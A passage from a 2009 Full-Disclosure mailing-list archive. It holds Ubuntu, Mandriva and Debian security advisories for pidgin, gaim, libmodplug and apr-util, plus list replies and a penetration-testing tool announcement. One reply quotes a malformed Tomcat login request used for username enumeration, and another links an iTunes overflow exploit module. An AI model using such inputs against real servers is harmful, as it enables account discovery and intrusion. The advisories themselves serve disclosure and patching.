http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.5.2-0ubuntu1.2_all.deb Size/MD5: 94868 f2f3cc3410268e74487fa16fb3d410ed http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.5.2-0ubuntu1.2_all.deb Size/MD5: 242302 4ef3557231e12e7cf34bcb249109034f http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.5.2-0ubuntu1.2_all.deb Size/MD5: 1106854 5c9bc67c07da0c8e633970d1e9db3f48 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.5.2-0ubuntu1.2_all.deb Size/MD5: 1357176 ed07a18f8bdc63fa953c74b0c175e50f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.2_amd64.deb Size/MD5: 230066 d4c2dc45b4a32f8f8d6da9f6086af24e http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.2_amd64.deb Size/MD5: 1754456 fe7611e988e8d22a65abbe1301d2965b http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.2_amd64.deb Size/MD5: 4660352 66cca2215df947143266932d10af883f http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2_amd64.deb Size/MD5: 613956 adfbc24ab8c5eb3b21bb7f628c61bdce i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.2_i386.deb Size/MD5: 204004 0e0d344adeda941342d8fb7867668dbf http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.2_i386.deb Size/MD5: 1503322 8f66c12c95d7c552309ae57dd043a29a http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.2_i386.deb Size/MD5: 4464482 1e3f00d26b6e416bd75bf695ce1e09c0 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2_i386.deb Size/MD5: 559582 0fb6713e8965f9b9eca4d74eaf7ae7a9 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.2_lpia.deb Size/MD5: 200664 2d974ab524d81fc118471ae19e1c8937 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.2_lpia.deb Size/MD5: 1552110 c4f9431b8bdadbec7fb5e408fcd1acfc http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.2_lpia.deb Size/MD5: 4599180 d9064f44228e108cb661bd7906ab7386 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2_lpia.deb Size/MD5: 553788 c9f8e5422da2e8e6576f39db4cd2085d powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.2_powerpc.deb Size/MD5: 235480 d9ee88f9545b7b58db2cd68fe6a8066b http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.2_powerpc.deb Size/MD5: 1790404 c1b95833f5bb7324267dd5155d950441 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.2_powerpc.deb Size/MD5: 4684942 acb33467a37ed8f102ebde7054c946d6 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2_powerpc.deb Size/MD5: 619564 4bfd7a4e496b8647071846ad0616657a sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.2-0ubuntu1.2_sparc.deb Size/MD5: 217318 cdbd481faa314f8ba35f35a475a42795 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.2-0ubuntu1.2_sparc.deb Size/MD5: 1682664 fab2a1a49a81a68ae6a93616bd570555 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.2-0ubuntu1.2_sparc.deb Size/MD5: 4586562 d459d38877c2249fc561b77732f9b79e http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.2-0ubuntu1.2_sparc.deb Size/MD5: 590732 a0fc31cd9e06ba80c350e0a9b7f80c03 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1.diff.gz Size/MD5: 64524 fee7dadd7a38c04558ab4c09d5f42aa1 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1.dsc Size/MD5: 1932 0fb4cdde59be102a856ab10e00b8e043 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5.orig.tar.gz Size/MD5: 11989031 08d9c0c8dd43dbcec6f67d8ba596029f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.5.5-1ubuntu8.1_all.deb Size/MD5: 38446 aef71d1ba6b6c7e8049e89ccc1bd88bb http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.5.5-1ubuntu8.1_all.deb Size/MD5: 97200 049318fbf3c736bf1832dbfd6dedde2c http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.5.5-1ubuntu8.1_all.deb Size/MD5: 245162 1726a391577683475060704eb55bdf9a http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.5.5-1ubuntu8.1_all.deb Size/MD5: 1150574 431c7d4325133491b6e1fa688c4a9242 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.5.5-1ubuntu8.1_all.deb Size/MD5: 1371370 5e90e70e80ed5e0b7f36695464c5f72a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.1_amd64.deb Size/MD5: 235086 6d2fce235edeb7a32a7a86c57a71b2ed http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.1_amd64.deb Size/MD5: 1803258 2304c36adbcfc8349a4a3952808a2bb8 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.1_amd64.deb Size/MD5: 5845696 c8594eceb93ccb3c6ada5cd1ee230912 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1_amd64.deb Size/MD5: 567404 8a8b1b7a23f63312034a040cb1aa7e63 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.1_i386.deb Size/MD5: 213598 ab2e38a8d6530963231b39a9829fb2d2 http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.1_i386.deb Size/MD5: 1587104 90fbc2afe03c377aba029781ff5fe1df http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.1_i386.deb Size/MD5: 5447882 24f1c24b149fb328ccdea99eca1acafa http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1_i386.deb Size/MD5: 519328 4de797df556660bbe4c0f6f28e8e11bb lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.1_lpia.deb Size/MD5: 212132 db58cde6f7138b158176b670bc74c119 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.1_lpia.deb Size/MD5: 1646866 180f87c414b037c37b0dead0cc0bda72 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.1_lpia.deb Size/MD5: 5594786 cd51cab94e155ee1174eee622d4691a3 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1_lpia.deb Size/MD5: 518520 ee049929d1b3a60629ae8a00b6e710f2 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.1_powerpc.deb Size/MD5: 245176 613a00f19ae14501f10b350cdb795d12 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.1_powerpc.deb Size/MD5: 1859288 69a9954613a68b7191c801a61930e4e8 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.1_powerpc.deb Size/MD5: 5758266 a66bc8ac7ea4f8e8e1e1fb3367f5b25b http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1_powerpc.deb Size/MD5: 580976 3dd98008da3a34ab79726ee3efcb9d20 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.5.5-1ubuntu8.1_sparc.deb Size/MD5: 214658 dddd0b9de17382e79c0bf6e497c78676 http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.5.5-1ubuntu8.1_sparc.deb Size/MD5: 1673626 1f462818b9b194368d7451b70a148f07 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin-dbg_2.5.5-1ubuntu8.1_sparc.deb Size/MD5: 5291802 1b1510fb9035637aebb5bce856484c75 http://ports.ubuntu.com/pool/main/p/pidgin/pidgin_2.5.5-1ubuntu8.1_sparc.deb Size/MD5: 522160 af6ecc55c88eede805e1398e5204bdf3 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090603/00c8ee8c/attachment.bin From marc.deslauriers at canonical.com Wed Jun 3 15:20:54 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Wed, 03 Jun 2009 10:20:54 -0400 Subject: [Full-disclosure] [USN-781-2] Gaim vulnerabilities Message-ID: <1244038854.12402.2.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-781-2 June 03, 2009 gaim vulnerabilities CVE-2009-1373, CVE-2009-1376 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: gaim 1:1.5.0+1.5.1cvs20051015-1ubuntu10.2 After a standard system upgrade you need to restart Gaim to effect the necessary changes. Details follow: It was discovered that Gaim did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Gaim to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373) It was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.2.diff.gz Size/MD5: 35032 018074e6f3fe79b0334b616c41db8f16 http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.2.dsc Size/MD5: 1061 fedec169b55ed59a1d258f4261d3342e http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015.orig.tar.gz Size/MD5: 4299145 949ae755e9be1af68eef6c09c36a7530 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-data_1.5.0+1.5.1cvs20051015-1ubuntu10.2_all.deb Size/MD5: 613400 851c17117f60a8bdd7a1a7945295bb95 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.2_amd64.deb Size/MD5: 103268 3e801c048c16f37927274e223006cf12 http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.2_amd64.deb Size/MD5: 954312 b221c7923480c8f561b19f25602fb42d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.2_i386.deb Size/MD5: 103268 7c5d619c893be0613fc3e9e520180ac3 http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.2_i386.deb Size/MD5: 836516 36ab380abace72300ba4aa0da8af0423 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.2_powerpc.deb Size/MD5: 103266 f8d87f5da7ae492b3e5564c132afb4de http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.2_powerpc.deb Size/MD5: 924684 227c223828b0edcc564397b37281636a sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.2_sparc.deb Size/MD5: 103252 4e6a313eced48612d2f35ab69ebd85b1 http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.2_sparc.deb Size/MD5: 856864 9b00254efd713d0001bb7e11817e6bc3 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090603/4bfdd2d4/attachment.bin From deepquest at yahoo.com Wed Jun 3 15:49:30 2009 From: deepquest at yahoo.com (Oliver) Date: Wed, 3 Jun 2009 07:49:30 -0700 (PDT) Subject: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities Message-ID: <370100.84860.qm@web110010.mail.gq1.yahoo.com> Dude watch ascii porn you'll feel better. The apple thing has been around for ages. Just look at the facts based on stats, not emotional POV. If ppl want to pay more it's not a security related problem so off topic here. Take it easy, Deepquest On 3 Jun 2009, at 19:47, Nick FitzGerald <nick at virus-l.demon.co.uk> wrote: Thierry Zoller to Will Drewry: WD> Here's the (mac) exploit module to go along with my simul-report to WD> apple: http://static.dataspill.org/releases/itunes/itms_overflow.rb OMFG, you must by kidding, are we 1999 again ?? Classical Stack buffer overflow in URL request ?! ..o m f g =) Nice find! You must be wrong! It's a well-known fact -- just ask any Apple fanboi -- that Macs are invulnerable to security exploits of any kind because they are based on Unix-ish and/or open source code and/or are developed by far cooler _and_ cleverer dudes than anyone who ever worked at MS (or anywhere else for that matter, except NeXT) and/or because Steve (the sun shines out my orifices) Jobs said so... So, now we've established that you are wrong, HTF can anyone at Apple seriously claim their shit is worth bottling given they keep getting caught with such egregiously crappy bugs in their code? And how is it that folk who really should know better keep feeding this line of BS? Oh, that's right, they need to justify the grossly excessive cost of those non-Windows x86 machines they've been buying the last few years... Regards, Nick FitzGerald _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From security at mandriva.com Wed Jun 3 17:21:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 03 Jun 2009 18:21:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:127 ] gaim Message-ID: <E1MBtD2-00046Z-KS@titan.mandriva.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:127 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gaim Date : June 3, 2009 Affected: Corporate 3.0 _______________________________________________________________________ Problem Description: It was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2008-2927) _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927 _______________________________________________________________________ Updated Packages: Corporate 3.0: f33a114cbf007f28fd6e8198ca1ebca2 corporate/3.0/i586/gaim-1.5.0-0.2.C30mdk.i586.rpm 36237a65920d5ed005aa3a15a4cd3c56 corporate/3.0/i586/gaim-devel-1.5.0-0.2.C30mdk.i586.rpm 638615c071a4118e4ecbec232930308d corporate/3.0/i586/gaim-perl-1.5.0-0.2.C30mdk.i586.rpm c4d0735b587705b70c1423b4a79d89ca corporate/3.0/i586/gaim-tcl-1.5.0-0.2.C30mdk.i586.rpm 7db03353a62b5de39906113c585c5fb4 corporate/3.0/i586/libgaim-remote0-1.5.0-0.2.C30mdk.i586.rpm 671616d112af90f9cffc359aa08c764f corporate/3.0/i586/libgaim-remote0-devel-1.5.0-0.2.C30mdk.i586.rpm 43d70b5e7e3dda956660cda4a88e9e8b corporate/3.0/SRPMS/gaim-1.5.0-0.2.C30mdk.src.rpm Corporate 3.0/X86_64: 1c01cd160fc75a94efec2aa945e36b35 corporate/3.0/x86_64/gaim-1.5.0-0.2.C30mdk.x86_64.rpm 8262c9b0566cd80792c0bdc937821125 corporate/3.0/x86_64/gaim-devel-1.5.0-0.2.C30mdk.x86_64.rpm d3ca7daf40fcae4792f3e005e546a1f2 corporate/3.0/x86_64/gaim-perl-1.5.0-0.2.C30mdk.x86_64.rpm 23d7f53561346118cbf3aef045a325a5 corporate/3.0/x86_64/gaim-tcl-1.5.0-0.2.C30mdk.x86_64.rpm d1f44f583038fe88d01afb1df936072f corporate/3.0/x86_64/lib64gaim-remote0-1.5.0-0.2.C30mdk.x86_64.rpm fbb9ef34e9771a666717d6ea45246cf1 corporate/3.0/x86_64/lib64gaim-remote0-devel-1.5.0-0.2.C30mdk.x86_64.rpm 43d70b5e7e3dda956660cda4a88e9e8b corporate/3.0/SRPMS/gaim-1.5.0-0.2.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKJniEmqjQ0CJFipgRAmmYAJ9Ws9bVrOxm9QaFSM7UmlpwR4qYSQCfeaER dMI/55ysmlo17nZXRkr0P2k= =NIbs -----END PGP SIGNATURE----- From mrdkaaa at stream.cz Wed Jun 3 17:25:58 2009 From: mrdkaaa at stream.cz (mrdkaaa) Date: Wed, 03 Jun 2009 18:25:58 +0200 (CEST) Subject: [Full-disclosure] Hardening TCP/IP Stack In-Reply-To: <361c9c560906030605q3d452467mbd2223ed80766020@mail.gmail.com> Message-ID: <1227.3138-10623-1285487100-1244046358@stream.cz> http://cr.yp.to/syncookies.html > *Hardening TCP/IP Stack* > > *By Ahmed S. Shibani* > > * * > > *Overview* > > * * > > During my work as a server administrator for a web hosting company, I > have noticed how often it is to get under random SYN flood attacks, and > using the latest firewalls did not prove to be the ultimate solution, you > still get affected by the attacks, I believe that the best way to mitigate > those attacks is by securing the TCP/IP stack itself, here I will collect > the most useful information I have found on doing this. All instructions in > this article will be for Linux, I will indicate so if different. > > Continue > Reading...<http://sec.ure.ly/?s=blog&m=permalink&x=hardening-tcpip-stack> > > http://sec.ure.ly > > > From cybseclabs at cybsec.com Thu Jun 4 15:00:33 2009 From: cybseclabs at cybsec.com (CYBSEC-Labs) Date: Thu, 04 Jun 2009 11:00:33 -0300 Subject: [Full-disclosure] CYBSEC-Labs: New sapyto release - Windows support and more! Message-ID: <4A27D381.7070502@cybsec.com> Dear colleague, We are pleased to announce that a new sapyto version (v0.99-Public_Edition) is ready. sapyto is the first and unique SAP Penetration Testing Framework, which assists security professionals in assessing the security level of these business-critical systems. There have been many changes in this version, being some of the most important ones: . Windows support! Now sapyto runs on Windows 2000/2003/XP/Vista. . Automatic connector discovery and target configuration. . The so-far-missing sapyto's User Guide. . Vulnerability reporting and analysis. . Improved CLI with autocompletion, better help and presentation. . Architecture changed quite a bit, in order to support for upcoming releases (GUI). . New plugins for discovering SAP Application Servers, assess SAP/Oracle implementations and more ... You can download sapyto directly from http://www.cybsec.com/sapyto We hope you enjoy this new release. As always, comments, bug reports, feature requests and new ideas are more than welcome and will be seriously considered. sapyto v1.00 (with a nice GUI and many more features) is just around the corner... Stay tuned! Best Regards, Mariano Nu?ez Di Croce The CYBSEC-Labs Team http://www.cybsec.com From chris at christopherschultz.net Thu Jun 4 17:48:19 2009 From: chris at christopherschultz.net (Christopher Schultz) Date: Thu, 04 Jun 2009 12:48:19 -0400 Subject: [Full-disclosure] [SECURITY] CVE-2009-0580 Apache Tomcat User enumeration vulnerability with FORM authentication In-Reply-To: <4A2699C9.3070402@apache.org> References: <4A2699C9.3070402@apache.org> Message-ID: <4A27FAD3.8060202@christopherschultz.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mark, On 6/3/2009 11:42 AM, Mark Thomas wrote: > CVE-2009-0580: Tomcat information disclosure vulnerability I know I'm likely to get a vague response, but could you provide some more info about this issue? > Due to insufficient error checking in some authentication classes, > Tomcat allows for the enumeration (brute force testing) of usernames by > supplying illegally URL encoded passwords. [snip] > j_username=tomcat&j_password=% I'm not sure how the patch (I read the patch for TC5.5 DataSourceRealm.java) changes anything at all: it appears to be merely a performance optimization. No changes are made to the behavior of Tomcat, since the same null is returned to the caller if the credentials do not match. I don't see any information disclosure vulnerability in the first place, and I don't see how your patch would have fixed it. ??! - -chris -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkon+tMACgkQ9CaO5/Lv0PCd5ACfcBAJjcKnjKjDgChIezhr8Oty MkQAoKUVc0ynWGvtp0Wf4S42Jeytxwwk =iKFX -----END PGP SIGNATURE----- From security at mandriva.com Thu Jun 4 18:22:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 04 Jun 2009 19:22:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:128 ] libmodplug Message-ID: <E1MCGdd-0003ba-H6@titan.mandriva.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:128 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libmodplug Date : June 4, 2009 Affected: 2008.1, 2009.0, 2009.1 _______________________________________________________________________ Problem Description: Multiple security vulnerabilities has been identified and fixed in libmodplug: Integer overflow in the CSoundFile::ReadMed function (src/load_med.cpp) in libmodplug before 0.8.6, as used in gstreamer-plugins and other products, allows context-dependent attackers to execute arbitrary code via a MED file with a crafted (1) song comment or (2) song name, which triggers a heap-based buffer overflow (CVE-2009-1438). Buffer overflow in the PATinst function in src/load_pat.cpp in libmodplug before 0.8.7 allows user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via a long instrument name (CVE-2009-1513). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1438 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1513 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 13d1666d8bf6b8b7c51d7d8878633a73 2008.1/i586/libmodplug0-0.8.4-3.1mdv2008.1.i586.rpm d75251ccb63f34aa986ffb4d1f0fcbea 2008.1/i586/libmodplug0-devel-0.8.4-3.1mdv2008.1.i586.rpm d6dcdf053b4dfda1cce181b33970db90 2008.1/SRPMS/libmodplug-0.8.4-3.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 05031124a2a50613c72745126f33556b 2008.1/x86_64/lib64modplug0-0.8.4-3.1mdv2008.1.x86_64.rpm 375642e9e070aae7d7a6a18752bd3459 2008.1/x86_64/lib64modplug0-devel-0.8.4-3.1mdv2008.1.x86_64.rpm d6dcdf053b4dfda1cce181b33970db90 2008.1/SRPMS/libmodplug-0.8.4-3.1mdv2008.1.src.rpm Mandriva Linux 2009.0: ca0f1757e5e547a96a568c5d402a3973 2009.0/i586/libmodplug0-0.8.4-4.1mdv2009.0.i586.rpm 617508702e6a16e34b678de36cd1a540 2009.0/i586/libmodplug0-devel-0.8.4-4.1mdv2009.0.i586.rpm f5beea611ec43f6e0885a27ac1aff48e 2009.0/SRPMS/libmodplug-0.8.4-4.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b11968a05f7c82d19b0390487b1e7519 2009.0/x86_64/lib64modplug0-0.8.4-4.1mdv2009.0.x86_64.rpm 8b25ba2561e0bd40dd7d98ad5c84b6f2 2009.0/x86_64/lib64modplug0-devel-0.8.4-4.1mdv2009.0.x86_64.rpm f5beea611ec43f6e0885a27ac1aff48e 2009.0/SRPMS/libmodplug-0.8.4-4.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 1abe20b593278e00f5ce84d4bbc3ef22 2009.1/i586/libmodplug0-0.8.6-1.1mdv2009.1.i586.rpm ca319b4bc390014447dcf84cf6e93934 2009.1/i586/libmodplug-devel-0.8.6-1.1mdv2009.1.i586.rpm 460772bdd5802f79ee87dcc714fb5662 2009.1/SRPMS/libmodplug-0.8.6-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 26bc4c5a7433209f2fcdf801cb7ac821 2009.1/x86_64/lib64modplug0-0.8.6-1.1mdv2009.1.x86_64.rpm 9e2b15436be6e7a8f6d1baf63be7ae53 2009.1/x86_64/lib64modplug-devel-0.8.6-1.1mdv2009.1.x86_64.rpm 460772bdd5802f79ee87dcc714fb5662 2009.1/SRPMS/libmodplug-0.8.6-1.1mdv2009.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKJ9ZVmqjQ0CJFipgRAqiwAJ0RQ25gVT5wWgdqDmdPq0BBMDIlawCg7mbU P5B1mQcmpslRBpv/z8vd+RI= =h3GO -----END PGP SIGNATURE----- From sf at debian.org Thu Jun 4 20:22:36 2009 From: sf at debian.org (Stefan Fritsch) Date: Thu, 4 Jun 2009 21:22:36 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1812-1] New apr-util packages fix several vulnerabilities Message-ID: <20090604192236.GA19167@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1812-1 security at debian.org http://www.debian.org/security/ Stefan Fritsch June 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : apr-util Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2009-0023 Apr-util, the Apache Portable Runtime Utility library, is used by Apache 2.x, Subversion, and other applications. Two denial of service vulnerabilities have been found in apr-util: "kcope" discovered a flaw in the handling of internal XML entities in the apr_xml_* interface that can be exploited to use all available memory. This denial of service can be triggered remotely in the Apache mod_dav and mod_dav_svn modules. (No CVE id yet) Matthew Palmer discovered an underflow flaw in the apr_strmatch_precompile function that can be exploited to cause a daemon crash. The vulnerability can be triggered (1) remotely in mod_dav_svn for Apache if the "SVNMasterURI"directive is in use, (2) remotely in mod_apreq2 for Apache or other applications using libapreq2, or (3) locally in Apache by a crafted ".htaccess" file. (CVE-2009-0023) Other exploit paths in other applications using apr-util may exist. If you use Apache, or if you use svnserve in standalone mode, you need to restart the services after you upgraded the libaprutil1 package. For the stable distribution (lenny), these problems have been fixed in version 1.2.12+dfsg-8+lenny2. The oldstable distribution (etch), these problems have been fixed in version 1.2.7+dfsg-2+etch2. For the testing distribution (squeeze) and the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your apr-util packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/a/apr-util/apr-util_1.2.7+dfsg-2+etch2.diff.gz Size/MD5 checksum: 33117 ed3dc8bd1a5891432d7fc0614b94becd http://security.debian.org/pool/updates/main/a/apr-util/apr-util_1.2.7+dfsg.orig.tar.gz Size/MD5 checksum: 643328 a3117be657f99e92316be40add59b9ff http://security.debian.org/pool/updates/main/a/apr-util/apr-util_1.2.7+dfsg-2+etch2.dsc Size/MD5 checksum: 1036 982d6c15afd4477277b01c004b7c8ac0 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/a/apr-util/libaprutil1_1.2.7+dfsg-2+etch2_alpha.deb 